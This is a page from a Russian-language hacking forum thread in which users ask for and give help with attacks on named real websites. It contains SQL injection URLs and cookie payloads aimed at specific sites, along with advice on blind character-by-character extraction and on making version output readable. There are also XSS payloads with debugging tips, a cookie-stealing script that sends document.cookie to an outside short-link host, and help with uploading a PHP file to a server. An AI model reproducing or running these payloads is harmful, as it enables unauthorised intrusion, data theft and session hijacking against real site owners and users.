Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    увы, вывода нет.
    Code:
    http://www.heritage.am/ru/component/blog_calendar/?year=2015&month=02&day=13&modid=61+and+1=2/*%00*/union+select+6666666666--+
     
    _________________________
  2. lindau

    lindau New Member

    Joined:
    8 Jul 2015
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Вот жеж беда =((
    Для посимвольного перебора тогда получается так: http://www.heritage.am/ru/component...*/+and+substring((select+version()),1,1)=5--+ ?

    Это ведь Joomla, стандартная таблица jos_users?
     
  3. djon

    djon New Member

    Joined:
    6 Jul 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Почему когда пробую отправить файл через форму

    <form action="www.site.ru" method=post enctype=multipart/form-data>
    <input type=file name=file size=40>
    <input type=submit value=Загрузить>
    </form>

    ссылка преобразуется так www.site.ru/?file=dk.php и файл или картинка не запускается,просто обычную страницу грузит
     
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    начните с азов. html это язык разметки, а не язык программирования. через него вы не сможете залить файл
     
    _________________________
  5. djon

    djon New Member

    Joined:
    6 Jul 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    -------------------------------------------------------------------------------------------------------------------------------------------------
    Что я делаю не так ?выдает ошибку Warning: move_uploaded_file(): Unable to move '/tmp/phpT9YXce' to 'http://www.site.ru/p1/dk.php' in /home/u941469589/public_html/upload.php on line 12
    -------------------------------------------------------------------------------------------------------------------------------------------------
    сама форма
    -------------------------------------------------------------------------------------------------------------------------------------------------
    <form action="http://pro100gul.tioo.ru/upload.php" method="post" enctype="multipart/form-data">
    <input type="file" name="filename"><br>
    <input type="submit" value="Загрузить"><br>
    </form>
    -------------------------------------------------------------------------------------------------------------------------------------------------
    сам upload.php
    -------------------------------------------------------------------------------------------------------------------------------------------------
    <?php
    if($_FILES["filename"]["size"] > 1024*3*1024)
    {
    echo ("Размер файла превышает три мегабайта");
    exit;
    }
    // Проверяем загружен ли файл
    if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
    {
    // Если файл загружен успешно, перемещаем его
    // из временной директории в конечную
    move_uploaded_file($_FILES["filename"]["tmp_name"], "http://www.site.ru/p1/".$_FILES["filename"]["name"]);
    } else {
    echo("Ошибка загрузки файла");
    }
    ?>
    -------------------------------------------------------------------------------------------------------------------------------------------------
     
  6. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Ребят у меня есть программа для поиска уязвимости,я перевёл гуглом так что не ругайтесь
    Сведения об уязвимости
    обнаружено, что данные пароля передаются через HTTP.
    влияние
    Если злоумышленник может перехватить трафик, он / она может украсть учетные данные пользователей.
    Действия, чтобы Взять
    См средство для решения.
    Переместить все ваши критические форм и страниц HTTPS и не служи им через HTTP.
    средство
    Все конфиденциальные данные должны быть переданы по протоколу HTTPS, а не HTTP. Формы должны быть поданы в течение HTTPS. Все аспекты применения, которые принимают пользовательский ввод, начиная с процесса входа в систему, должны обслуживаться только через HTTPS.
    Форма цель действия :
    http://*******.ru/wp-login.php . Сайт я не скажу естественно . Дак вот что мне нужно сделать? .
    Есть HTML код страницы
    <html style="border:none">?<!DOCTYPE html>
    <!--[if IE 8]>
    <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="ru-RU">
    <![endif]-->
    <!--[if !(IE 8) ]><!-->
    <html xmlns="http://www.w3.org/1999/xhtml" lang="ru-RU">
    <!--<![endif]-->
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>******.ru &rsaquo; Войти</title>
    <link rel='stylesheet' id='open-sans-css' href='//fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400italic%2C600italic%2C300%2C400%2C600&#038;subset=latin%2Clatin-ext%2Ccyrillic%2Ccyrillic-ext&#038;ver=4.0.5' type='text/css' media='all' />
    <link rel='stylesheet' id='dashicons-css' href='http://*******.ru/wp-includes/css/dashicons.min.css?ver=4.0.5' type='text/css' media='all' />
    <link rel='stylesheet' id='wp-admin-css' href='http://*******.ru/wp-admin/css/wp-admin.min.css?ver=4.0.5' type='text/css' media='all' />
    <link rel='stylesheet' id='buttons-css' href='http://*******.ru/wp-includes/css/buttons.min.css?ver=4.0.5' type='text/css' media='all' />
    <!--[if lte IE 7]>
    <link rel='stylesheet' id='ie-css' href='http://*******.ru/wp-admin/css/ie.min.css?ver=4.0.5' type='text/css' media='all' />
    <![endif]-->
    <meta name='robots' content='noindex,follow' />
    </head>
    <body class="login login-action-login wp-core-ui" style="background-color:#000000;">
    <center>
    <div id="login">
    <h1>
    <!--
    <a href="http://wordpress.org/" title="Сайт работает на WordPress">*******.ru</a>
    -->
    </h1>

    <a href="http://*******.ru/"><img src="http://www.*******.ru/img/logo_helpset.png" border="0" width="209"></a>
    <center>
    <form name="loginform" id="loginform" action="http://*******.ru/wp-login.php" method="post">
    <p>
    <label for="user_login">Имя пользователя<br />
    <input type="text" name="log" id="user_login" class="input" value="" size="20" /></label>
    </p>
    <p>
    <label for="user_pass">Пароль<br />
    <input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></label>
    </p>
    <p class="forgetmenot"><label for="rememberme"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /> Запомнить меня</label></p>
    <p class="submit">
    <input type="submit" name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Войти" />
    <input type="hidden" name="redirect_to" value="http://*******.ru/wp-admin/post.php?action=edit&amp;post={post-id}" />
    <input type="hidden" name="testcookie" value="1" />
    </p>
    </form>
    </center>
    <p id="nav">
    <a href="http://*******.ru/wp-login.php?action=register">Регистрация</a> | <a href="http://*******.ru/wp-login.php?action=lostpassword" title="Восстановление пароля">Забыли пароль?</a>
    </p>

    <script type="text/javascript">
    function wp_attempt_focus(){
    setTimeout( function(){ try{
    d = document.getElementById('user_login');
    d.focus();
    d.select();
    } catch(e){}
    }, 200);
    }

    wp_attempt_focus();
    if(typeof wpOnload=='function')wpOnload();
    </script>

    <center>
    <!--LiveInternet counter--><script type="text/javascript">document.write("<a href='http://www.liveinternet.ru/click' target=_blank><img src='//counter.yadro.ru/hit?t44.1;r" + escape(top.document.referrer) + ((typeof(screen)=="undefined")?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth)) + ";u" + escape(document.URL) + ";" + Math.random() + "' border=0 width=31 height=31 alt='' title='LiveInternet'><\/a>")</script><!--/LiveInternet-->
    </center>


    <p id="backtoblog"><a href="http://www.*******.ru/" title="Потерялись?">&larr; Назад к сайту &laquo;*******.ru&raquo;</a></p>

    </div>


    <div class="clear"></div>
    </center>
    </body>
    </html>

    Не знаю поможет ли это :
    GET /wp-login.php?redirect_to=http%3A%2F%2F*****.ru%2Fwp-admin%2Fpost.php%3Faction%3Dedit%26post%3D%257Bpost-id%257D&reauth=1 HTTP/1.1
    Cache-Control: no-cache
    Referer: http://*****.ru/wp-admin/post.php?action=edit&post={post-id}
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker
    Accept-Language: en-us,en;q=0.5
    X-Scanner: ******
    Host: ****.ru
    Cookie: 21e558d425bf38e4a2473c40a5b0b2b9=85df36e59c655c31d0b01c3be92e0d0d
    Accept-Encoding: gzip, deflate
    ---------------------------------------------------------------------------------------
    robots.txt :
    User-agent: *
    Disallow: /cgi-bin/
    Disallow: /wp-admin/
    Allow: /doc/
    Allow: /img/
    Allow: /wp-content/uploads/
    -------------------------------------------
    Сведения об уязвимости определены cookie(s), не помеченных как HttpOnly.

    HttpOnly cookie(s) не может быть прочитан на стороне клиента сценариев, поэтому маркировка печенье, как HttpOnly может обеспечить дополнительный уровень защиты от атак межсайтового скриптинга(это вроде xxs . )
    влияние
    Во время межсайтового сценария атаки(xxs?), злоумышленник может легко получить доступ к куки и угнать сессию жертвы.
    Действия, чтобы Взять
    См средство для решения.
    Рассмотрим маркировки всех печенье, используемых приложением как HttpOnly. (После этих изменений JavaScript код не будет в состоянии прочитать печенье).
    средство
    Отметить куки, как HttpOnly. Это будет дополнительный слой защиты от XSS. Однако это не серебряная пуля и не будет защищать систему от атак межсайтового скриптинга.Злоумышленник может использовать такой инструмент, как XSS туннель, чтобы обойти HttpOnly защиты.
    Внешние ссылки
    Как это сделать ? .

    -----------------------------------------------------------------------------------

    Url http://*******.ru/wp-login.php?action=lostpassword
    Identified Field Name user_login .
    Сведения об уязвимости обнаружено, что автополный включен в одном или нескольких полях формы.

    Это были важные поля, такие как "кредитная карта".

    Влияние
    Если пользователь выбирает для сохранения, данные, введенные в этих областях будут кэшироваться браузером. Злоумышленник, могут получить доступ к браузеру жертвы мог украсть эту информацию. Это особенно важно, если приложение обычно используется в общих компьютеров, таких как интернет-кафе или терминалов аэропорта.
    Действия, чтобы Взять
    Добавить атрибут автозаполнения = "OFF" в виде тега или отдельных «входных» полей.
    Найти все экземпляры входов, которые хранят личные данные и выключить автозаполнение. Поля, которые содержат данные, такие как "кредитная карта" или "CCV" типа данных, не следует кэшировать. Вы можете позволить приложению кэшировать имена и запоминать пароли; Однако, в большинстве случаев это не рекомендуется.
    Re-сканирование приложения после устранения выявленных проблем, чтобы обеспечить все исправления были применены правильно.
    Требуемые навыки для успешной эксплуатации
    Во-первых, злоумышленник должен либо физический доступ или права выполнения кода пользовательского уровня для успешной эксплуатации. Демпинг все данные из браузера может быть довольно легко, и количество автоматизированных инструментов существуют для проведения этого. Где злоумышленник не может выводить данные, он / она все еще может просматривать недавно посещенные веб-сайты и активировать функцию автозаполнения, чтобы увидеть ранее введенные значения.
    Внешние ссылки
    Использование автозаполнения в HTML форм
    П.С : При переходе на ссылку мне предлагают ввести емайл или логин где я получу новый пасс,естественно пашет токо на зареганный пользователей .
    -----------------------------------------------------------------------
    Url http://*******.ru/crossdomain.xml
    Правила политики <позволяют-доступа из домена = "*" к портам = "80" />

    Классификация Классификация
    OWASP 2010 A6
    OWASP 2013 А5
    КВО 16
    WASC 15
    Сведения об уязвимости обнаружил открытый файл crossdomain.xml политики.
    влияние
    Открыть файл политики crossdomain.xml позволяет другие файлы SWF, чтобы HTTP запросов к веб-серверу и увидеть его реакцию. Это может быть использован для доступа к одно время жетоны и CSRF одноразовые номера, чтобы обойти CSRF ограничений.
    средство
    Настройте crossdomain.xml, чтобы предотвратить доступ отовсюду к вашему домену.
    Внешние ссылки
    Рекомендации по использованию файла политики кросс-доменных для Flash Player
    Crossdomain.xml приглашает Cross-Site Mayhem .
    Как это сделать?

    [/spoiler=Инфа которая поможет]
     
    #306 SaNDER, 9 Jul 2015
    Last edited: 9 Jul 2015
  7. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    https://www.polyvinylrecords.com/we...te/eomsA19bR_Oe5L4nQhdVrw?product_id=split_ep

    Host: www.polyvinylrecords.com
    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Cookie: _ga=GA1.2.478174453.1436420788; PHPSESSID=vm6ku7j5ht07atf0n4gthmepk1; cart=k453dj5moskdvjcki8sbblbka69999999999999'+union+select+1,mid(version(),1,4),3,4,5+--+; __ar_v4=%7C7K674WVRA5EQTKVG7RIBHQ%3A20150708%3A1%7CSRBJNEWXLNH6JM5MFYZHWM%3A20150708%3A1%7CON7KI2FHTZEY5EYCVTEEGZ%3A20150708%3A1
    Connection: keep-alive

    Показываются только цифры, можно что нибудь придумать, что бы буквы тоже выводились ?
     
  8. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Использовать ascii(mid(version(),1,4)) или ord(mid(version(),1,4))
     
    _________________________
    #308 BigBear, 9 Jul 2015
    Last edited: 9 Jul 2015
    Br@!ns likes this.
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    1. логины пароли идут не через SSL
    2. у кук нет свойства httpOnly
    3. crossdomain.xml: читать тут https://forum.antichat.ru/threads/300591/
     
    _________________________
  10. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    путь должен быть локальным. у вас он есть в ошибке: /home/u941469589/public_html/
     
    _________________________
  11. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
  12. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    _________________________
    randman and Br@!ns like this.
  13. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
    Иньекция в переменную JavaScript
    Здравствуйте, подскажите, почему не выполняется alert:
    Code:
    http://0-99.net/?ac=2&slt=8&slr=1&lpt=1&query=\%27}%3B+alert%28%2Fxss%2F%29%3B%2F%2F%2F*&afdToken=CkAKEwjp7KW6k8_GAhVD4HIKHcuVA5gYAyAAULHPoAFosc-gAXE70B9vzKjYaJEBUbpy7KsxVDeRAXLdUtcEjNmhEhkAbTqKkDxz3zZHTsR-u1N6ySOikXD104RF&search=1
    Вывод:
    Code:
    'searchText': '\\'}; Alert(/Xss/);///*',
    -----------------------------------------------------------------------------------

    Похожая проблема у меня и вот с этой xss:
    Code:
    http://zhannei.baidu.com/cse/search?q=\%22%3Balert%28%29%3B%2F%2F&click=1&entry=1&s=3856084255718604899&nsid=
    Вывод:
    Code:
    pageLog["q"] = "\\\";alert();//";
     
    #313 ocheretko, 10 Jul 2015
    Last edited: 10 Jul 2015
  14. frank

    frank Member

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    96
    Reputations:
    28

    ну вот в этом случае
    экранируется ' и вы не выходите за пределы значения параметра, соответственно все воспринимается как текст(значение параметра)
     
  15. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
    мне почему то думалось, что экранирующий слеш экранируется вторым слешом, и стает не экранированным
     
  16. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    все верно. однако alert() у вас с большой буквы, такой функции нет. а во втором случае вы как раз не выходите за пределы кавычек, там же их три - \\\"
     
    _________________________
    ocheretko likes this.
  17. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
  18. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
  19. djon

    djon New Member

    Joined:
    6 Jul 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Можно ли скрипт <script>img = new Image(); img.src = "http://qoo.by/3aG?"+document.cookie;</script> укоротить до 45 символов ?
     
  20. 3ran

    3ran Member

    Joined:
    27 Jul 2012
    Messages:
    39
    Likes Received:
    19
    Reputations:
    5